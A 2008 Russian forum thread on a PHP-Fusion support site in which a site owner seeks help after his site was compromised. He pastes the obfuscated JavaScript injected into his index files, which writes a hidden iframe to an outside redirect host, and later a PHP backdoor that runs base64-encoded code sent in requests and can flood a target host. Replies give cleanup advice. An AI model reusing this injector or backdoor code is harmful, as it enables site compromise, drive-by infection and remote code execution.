Регистрация    Забыли пароль?        Правила форума    FAQ (читать перед созданием новой темы)
Имя   Пароль  запомнить
  
Просмотр темы
Вернуться на сайт: PHP-Fusion SF Russian Support Site

Форум поддержки PHP-Fusion SF | PHP-Fusion SF - Система Управлением Сайта | Ошибки / Bugs Reports
# 1 Тема: ВНИМАНИЕ
oldihome
Пользователь

Avatar пользователя

1q

Любитель Fusion

Сообщений: 148
Откуда: q11q
Зарегистрирован: 24 Сентября 2007, 15:58:13
Сказали спасибо 0 раз
Статус: offline
Опубликовано 11 Февраля 2008, 22:54:39
Случилась страшная ситуация, возможно из-за уязвимости в двиге или может по моей вине.
Сегодня я решил зайти к себе на сайт и меня начало переадресовывать на другие сайты, после чего нод32 начал материться и ругаться. Я сменил все пароли и посмотрел через фтп индексные фалы.
Они содержали странный код:
<!-- ~ --><SCRIPT LANGUAGE="JavaScript">
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!116!114!97!102!102!49!46!112!114!111!115!98!105!122!46!99!111!109!47!
116!100!115!47!105!102!114!97!109!101!46!112!104!112!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!32!119!105!100!1
16!104!61!34!48!34!32!104!101!105!103!104!116!61!34!48!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.c
harAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}
document.write(out);};
Decode();
</SCRIPT><!-- ~ --><!-- ~ --><SCRIPT LANGUAGE="JavaScript">
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!116!114!97!102!102!49!46!112!114!111!115!98!105!122!46!99!111!109!47!
116!100!115!47!105!102!114!97!109!101!46!112!104!112!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!32!119!105!100!1
16!104!61!34!48!34!32!104!101!105!103!104!116!61!34!48!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.c
harAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}
document.write(out);};
Decode();
</SCRIPT><!-- ~ --><!-- ~ --><SCRIPT LANGUAGE="JavaScript">
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!116!114!97!102!102!49!46!112!114!111!115!98!105!122!46!99!111!109!47!
116!100!115!47!105!102!114!97!109!101!46!112!104!112!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!32!119!105!100!1
16!104!61!34!48!34!32!104!101!105!103!104!116!61!34!48!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.c
harAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}
document.write(out);};
Decode();
</SCRIPT><!-- ~ --><!-- ~ --><SCRIPT LANGUAGE="JavaScript">
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!116!114!97!102!102!49!46!112!114!111!115!98!105!122!46!99!111!109!47!
116!100!115!47!105!102!114!97!109!101!46!112!104!112!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!32!119!105!100!1
16!104!61!34!48!34!32!104!101!105!103!104!116!61!34!48!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.c
harAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}
document.write(out);};
Decode();
</SCRIPT><!-- ~ --><!-- ~ --><SCRIPT LANGUAGE="JavaScript">
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!116!114!97!102!102!49!46!112!114!111!115!98!105!122!46!99!111!109!47!
116!1100!1

Я заменил их на старые и вроде всё заработало.
Расскажите мне ребята достаточно ли этих действий или надо там ещё что-нибудь поискать?
И как обезопасить себя в дальнейшем?
Спасибо за внимание.


[Изменил(а) oldihome, 11 Февраля 2008, 23:04:44]

--------------------
Наш строительный порал WWW.OLDIHOME.RU
Домашний любимец WWW.DRUG.OLDIHOME.RU
ProSex WWW.PLUS.OLDIHOME.RU
Авто Японии WWW.AVTO.OLDIHOME.RU
^ наверх ^ http://www.oldihome.ru
# 2  
Respectus
Пользователь

Avatar пользователя




Местный

Сообщений: 35
Зарегистрирован: 22 Января 2008, 19:40:08
Сказали спасибо 2 раз
Статус: offline
Опубликовано 11 Февраля 2008, 23:21:06
Если честно, я думаю не стоит трвожится - это стандартный вирус, и к твоему сайту на первое мнение не относится...

И на какие сайты тебя сбрасывали? Если на 18+ ... то значит ты там их и подловил, обычно, вирус сопроваждается установкой мини игр на тему 18+.
 
^ наверх ^
# 3  
classic
SF Team

Avatar пользователя

Классик

SF Support Team

Любитель Fusion

Сообщений: 353
Откуда: Москва, ВАО, Перово
Зарегистрирован: 18 Октября 2007, 01:42:47
Сказали спасибо 51 раз
Статус: offline
ICQ статус 350192996
Опубликовано 11 Февраля 2008, 23:59:35
Если честно, я думаю не стоит трвожится - это стандартный вирус, и к твоему сайту на первое мнение не относится...


Это каким-же образом к сайту не относится - если в индексных файлах на хостинге (я так понимаю в index.php) чужой код ?
 
^ наверх ^ 350192996
# 4  
classic
SF Team

Avatar пользователя

Классик

SF Support Team

Любитель Fusion

Сообщений: 353
Откуда: Москва, ВАО, Перово
Зарегистрирован: 18 Октября 2007, 01:42:47
Сказали спасибо 51 раз
Статус: offline
ICQ статус 350192996
Опубликовано 12 Февраля 2008, 00:01:11
Не всё вычистили - опять появилось. smiley
 
^ наверх ^ 350192996
# 5  
oldihome
Пользователь

Avatar пользователя

1q

Любитель Fusion

Сообщений: 148
Откуда: q11q
Зарегистрирован: 24 Сентября 2007, 15:58:13
Сказали спасибо 0 раз
Статус: offline
Опубликовано 12 Февраля 2008, 01:56:40
classic написал:
Если честно, я думаю не стоит трвожится - это стандартный вирус, и к твоему сайту на первое мнение не относится...


Это каким-же образом к сайту не относится - если в индексных файлах на хостинге (я так понимаю в index.php) чужой код ?


Все правильно вы понимаете.

classic написал:
Не всё вычистили - опять появилось. smiley


Не понял.
Где?
???


[Изменил(а) oldihome, 12 Февраля 2008, 01:58:02]

--------------------
Наш строительный порал WWW.OLDIHOME.RU
Домашний любимец WWW.DRUG.OLDIHOME.RU
ProSex WWW.PLUS.OLDIHOME.RU
Авто Японии WWW.AVTO.OLDIHOME.RU
^ наверх ^ http://www.oldihome.ru
# 6  
vjmykola
Пользователь

Avatar пользователя



Завсегдатый

Сообщений: 96
Откуда: Красноярск
Зарегистрирован: 27 Ноября 2007, 07:32:59
Сказали спасибо 3 раз
Статус: offline
ICQ статус 477807216
Опубликовано 12 Февраля 2008, 05:11:10
Было у меня такое. Вылечилось полным прогоном своего компа несколькими антивирусниками из-под дополнительной ОС - нашёл троянчиков, причём каждым антивирем разные вирусы нашёл.. А без этого - очистишь файлы на сервере, через день-два - всё опять там.


--------------------
Реализация долевого строительства
Поставки цемента
Мой персональный сайт
^ наверх ^ 477807216
# 7  
oldihome
Пользователь

Avatar пользователя

1q

Любитель Fusion

Сообщений: 148
Откуда: q11q
Зарегистрирован: 24 Сентября 2007, 15:58:13
Сказали спасибо 0 раз
Статус: offline
Опубликовано 12 Февраля 2008, 05:38:44
Я у себя всю систему грохнул и даже форматнул винтsmiley
Что дальше делать?


--------------------
Наш строительный порал WWW.OLDIHOME.RU
Домашний любимец WWW.DRUG.OLDIHOME.RU
ProSex WWW.PLUS.OLDIHOME.RU
Авто Японии WWW.AVTO.OLDIHOME.RU
^ наверх ^ http://www.oldihome.ru
# 8  
vjmykola
Пользователь

Avatar пользователя



Завсегдатый

Сообщений: 96
Откуда: Красноярск
Зарегистрирован: 27 Ноября 2007, 07:32:59
Сказали спасибо 3 раз
Статус: offline
ICQ статус 477807216
Опубликовано 12 Февраля 2008, 06:08:51
чисти файлы на серваке.


--------------------
Реализация долевого строительства
Поставки цемента
Мой персональный сайт
^ наверх ^ 477807216
# 9  
Sky
Супер Администратор

Avatar пользователя

АнарХия Х4

Администратор

Сообщений: 3023
Откуда: Astana
Зарегистрирован: 01 Апреля 2007, 18:11:10
Сказали спасибо 470 раз
Статус: offline
Опубликовано 12 Февраля 2008, 11:04:59
это хостера ломают... через двиг подмену файла сделать нельзя, если только на них 777 нестоит


--------------------
Я в контакте

Народ читаем и запоминаем!
Не помогаю по ICQ
Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
^ наверх ^
# 10  
vjmykola
Пользователь

Avatar пользователя



Завсегдатый

Сообщений: 96
Откуда: Красноярск
Зарегистрирован: 27 Ноября 2007, 07:32:59
Сказали спасибо 3 раз
Статус: offline
ICQ статус 477807216
Опубликовано 12 Февраля 2008, 13:10:35
Sky, дык, сидит троянчег, перехватывает пароли к фтп, и усё

здесь я описывал подобную проблему - как вылечил - написано выше.


--------------------
Реализация долевого строительства
Поставки цемента
Мой персональный сайт
^ наверх ^ 477807216
# 11  
pozitiv
SF Team

Avatar пользователя

паZитифф

SF Support Team

Почетный SF

Сообщений: 1676
Откуда: Киев
Зарегистрирован: 18 Ноября 2007, 18:49:13
Сказали спасибо 148 раз
Статус: offline
ICQ статус 3902393
Опубликовано 12 Февраля 2008, 19:22:59
сломали сервак и усе...ппц....это ужо нитвоя трабла а хостера.....


--------------------
wmz - Z226856101527
wmr - R513979829437

Все вопросы задавать на форуме. На вопросы заданные в приват или асю неотвечаю!
^ наверх ^ 3902393 http://nekto.me
# 12  
oldihome
Пользователь

Avatar пользователя

1q

Любитель Fusion

Сообщений: 148
Откуда: q11q
Зарегистрирован: 24 Сентября 2007, 15:58:13
Сказали спасибо 0 раз
Статус: offline
Опубликовано 13 Февраля 2008, 07:02:08
Спасибо.
А чистить как удобней?
Может просто перезалить файлы?


--------------------
Наш строительный порал WWW.OLDIHOME.RU
Домашний любимец WWW.DRUG.OLDIHOME.RU
ProSex WWW.PLUS.OLDIHOME.RU
Авто Японии WWW.AVTO.OLDIHOME.RU
^ наверх ^ http://www.oldihome.ru
# 13  
Sky
Супер Администратор

Avatar пользователя

АнарХия Х4

Администратор

Сообщений: 3023
Откуда: Astana
Зарегистрирован: 01 Апреля 2007, 18:11:10
Сказали спасибо 470 раз
Статус: offline
Опубликовано 13 Февраля 2008, 07:13:14
если ты их неменял, то лучше перезалить


--------------------
Я в контакте

Народ читаем и запоминаем!
Не помогаю по ICQ
Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
^ наверх ^
# 14  
oldihome
Пользователь

Avatar пользователя

1q

Любитель Fusion

Сообщений: 148
Откуда: q11q
Зарегистрирован: 24 Сентября 2007, 15:58:13
Сказали спасибо 0 раз
Статус: offline
Опубликовано 13 Февраля 2008, 07:28:41
Я уже не помню что именно я менял, отображение статей точно менял


--------------------
Наш строительный порал WWW.OLDIHOME.RU
Домашний любимец WWW.DRUG.OLDIHOME.RU
ProSex WWW.PLUS.OLDIHOME.RU
Авто Японии WWW.AVTO.OLDIHOME.RU
^ наверх ^ http://www.oldihome.ru
# 15  
vjmykola
Пользователь

Avatar пользователя



Завсегдатый

Сообщений: 96
Откуда: Красноярск
Зарегистрирован: 27 Ноября 2007, 07:32:59
Сказали спасибо 3 раз
Статус: offline
ICQ статус 477807216
Опубликовано 13 Февраля 2008, 07:30:52
там файлов-то немного, я вручную повырезал код


--------------------
Реализация долевого строительства
Поставки цемента
Мой персональный сайт
^ наверх ^ 477807216
# 16  
oldihome
Пользователь

Avatar пользователя

1q

Любитель Fusion

Сообщений: 148
Откуда: q11q
Зарегистрирован: 24 Сентября 2007, 15:58:13
Сказали спасибо 0 раз
Статус: offline
Опубликовано 23 Февраля 2008, 13:20:54
подскажите какие именно файлы смотреть, а то там очень их многоsmiley


--------------------
Наш строительный порал WWW.OLDIHOME.RU
Домашний любимец WWW.DRUG.OLDIHOME.RU
ProSex WWW.PLUS.OLDIHOME.RU
Авто Японии WWW.AVTO.OLDIHOME.RU
^ наверх ^ http://www.oldihome.ru
# 17  
oldihome
Пользователь

Avatar пользователя

1q

Любитель Fusion

Сообщений: 148
Откуда: q11q
Зарегистрирован: 24 Сентября 2007, 15:58:13
Сказали спасибо 0 раз
Статус: offline
Опубликовано 23 Февраля 2008, 13:26:52
Это не вредный код?

<?php
set_time_limit(0);
ignore_user_abort(true);

define('KEY','EOF');
define('AUTH',true);
define('DO_EVAL',true);

if(AUTH){if(!empty($_GET['key'])){if($_GET['key']!=KEY)die();}else die();}

if((!empty($_GET['eva']))&&(DO_EVAL)){eval(base64_decode($_GET['eva']));die();}
if((!empty($_POST['eva']))&&(DO_EVAL)){eval(base64_decode($_POST['eva']));die();}
if((!empty($_POST['stop']))){$file = fopen('log_s.php','w');fclose($file);die();}

if(!empty($_POST['host']))$host=$_POST['host'];
else $host='microsoft.com'; // ;)

if(!empty($_POST['patch']))$patch=$_POST['patch'];
else $patch='/';

if(!empty($_POST['port']))$port=$_POST['port'];
else $port='80';

if(!empty($_POST['count']))$count=$_POST['count'];
else $count='100';

if(!empty($_POST['headers'])){
$headers=$_POST['headers'];
$i2=0;
$host_ip=gethostbyname($host);
if(file_exists('log_s.php'))unlink('log_s.php');
for($i=0;$i<$count;$i++){
if($i2===100){
$i2=0;
$host_ip=gethostbyname($host);
}
$s=fsockopen($host_ip,$port) or die ();
fputs($s, $headers);
fclose($s);
if(file_exists('log_s.php')){
die();
}
$i2++;
}
}
?>


[Изменил(а) oldihome, 23 Февраля 2008, 13:27:51]

--------------------
Наш строительный порал WWW.OLDIHOME.RU
Домашний любимец WWW.DRUG.OLDIHOME.RU
ProSex WWW.PLUS.OLDIHOME.RU
Авто Японии WWW.AVTO.OLDIHOME.RU
^ наверх ^ http://www.oldihome.ru
# 18  
oldihome
Пользователь

Avatar пользователя

1q

Любитель Fusion

Сообщений: 148
Откуда: q11q
Зарегистрирован: 24 Сентября 2007, 15:58:13
Сказали спасибо 0 раз
Статус: offline
Опубликовано 23 Февраля 2008, 13:39:02
и вот ещё что нашел - http://www.oldihome.ru/ftp-tools/ только аккуратней, там похоже вирус
права на тнего установил 777 , посмотрите пожалуйста, это вроде не родное


[Изменил(а) oldihome, 23 Февраля 2008, 13:40:25]

--------------------
Наш строительный порал WWW.OLDIHOME.RU
Домашний любимец WWW.DRUG.OLDIHOME.RU
ProSex WWW.PLUS.OLDIHOME.RU
Авто Японии WWW.AVTO.OLDIHOME.RU
^ наверх ^ http://www.oldihome.ru
# 19  
oldihome
Пользователь

Avatar пользователя

1q

Любитель Fusion

Сообщений: 148
Откуда: q11q
Зарегистрирован: 24 Сентября 2007, 15:58:13
Сказали спасибо 0 раз
Статус: offline
Опубликовано 23 Февраля 2008, 13:47:51
вот что нашел
Прикрепленные файлы
Для просмотра вложения зарегистрируйтесь
Для просмотра вложения зарегистрируйтесь
Для просмотра вложения зарегистрируйтесь


[Изменил(а) oldihome, 23 Февраля 2008, 13:56:33]

--------------------
Наш строительный порал WWW.OLDIHOME.RU
Домашний любимец WWW.DRUG.OLDIHOME.RU
ProSex WWW.PLUS.OLDIHOME.RU
Авто Японии WWW.AVTO.OLDIHOME.RU
^ наверх ^ http://www.oldihome.ru
# 20  
pozitiv
SF Team

Avatar пользователя

паZитифф

SF Support Team

Почетный SF

Сообщений: 1676
Откуда: Киев
Зарегистрирован: 18 Ноября 2007, 18:49:13
Сказали спасибо 148 раз
Статус: offline
ICQ статус 3902393
Опубликовано 23 Февраля 2008, 13:56:25
а что ето???


--------------------
wmz - Z226856101527
wmr - R513979829437

Все вопросы задавать на форуме. На вопросы заданные в приват или асю неотвечаю!
^ наверх ^ 3902393 http://nekto.me
Перейти на форум:


105,592,086 уникальных посетителей
сейчас: 25 Ноября 2024, 03:53:40
Генерация страницы: 0.51 сек.

Original size:60 кб.
GZipped size: 10 кб.
Compression:84%